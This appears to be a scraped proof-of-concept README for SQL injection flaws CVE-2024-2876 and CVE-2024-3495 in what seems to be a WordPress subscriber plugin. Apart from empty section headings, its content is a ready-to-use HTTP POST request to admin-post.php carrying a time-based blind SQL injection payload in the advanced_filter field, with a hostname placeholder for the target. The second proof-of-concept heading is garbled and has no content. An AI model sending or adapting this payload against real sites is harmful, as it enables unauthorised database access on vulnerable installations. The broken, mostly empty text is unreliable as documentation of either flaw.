BreadcrumbsSQL_Injection_cve_2024
Description CVE-2024-2876
Description CVE-2024-3495
Query CVE-2024-2876
Query CVE-2024-3495
Proof of concept CVE-2024-2876
@timeout: 20s (using burpsuite)
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111Proof of concept CVE 2024-CVE-2024-3495
How to fix ? for [CVE-2024-2876]
Bounty Info [CVE-2024-2876]
Last updated